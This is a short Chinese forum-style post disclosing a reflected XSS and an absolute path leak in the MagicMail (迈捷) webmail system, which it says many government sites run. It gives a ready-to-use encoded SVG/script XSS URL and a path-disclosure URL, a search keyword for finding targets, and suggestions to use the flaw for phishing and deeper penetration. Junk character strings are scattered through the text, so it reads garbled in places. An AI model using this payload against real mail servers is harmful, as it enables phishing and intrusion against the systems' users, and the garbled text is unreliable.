今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞7 ~$ l% w& F* y0 B6 L6 s) ?& t; Z
4 _/ O9 O& @5 F. v U
& A/ V9 q9 T% W# H2 r
包含 一个反射性XSS 以及 绝对路径泄漏" @( q6 q( E7 I$ c1 y
看了看 貌似全部是linux的。
% ^5 J* F5 s5 b R2 A ; V0 ~* a# U% x2 U/ q; z, k
关键字:迈捷邮件系统 by MagicMail
9 i) a2 H/ g) x0 }
8 t* A& x# H4 D: N9 C可以看到很多政府网站都用这个邮件系统
& G" A1 d- a3 y! _: h+ d, u$ f
绝对路径 http://madman.in/index.php?login_type=declare&language=5 `' W- }; w" K" ?
W$ ~- }% z" H) O, p* m- S+ `4 p$ @% j1 B3 | d0 c- L
0 J/ b, X5 o7 P' s; q2 |, YXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E1 ^ |3 q; L. X7 K
2 i0 J" n6 Y- B& \7 i8 C% |$ e
4 U5 x6 R" d8 l& B7 X0 _
7 B z: I4 P+ \) _, g
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
$ _: h- C) N! J, a& g" g/ `. j8 }( q6 j
. x1 V: D/ H6 z* U% c修复方案:看官方补丁吧。1 `1 O: G+ D/ g H
|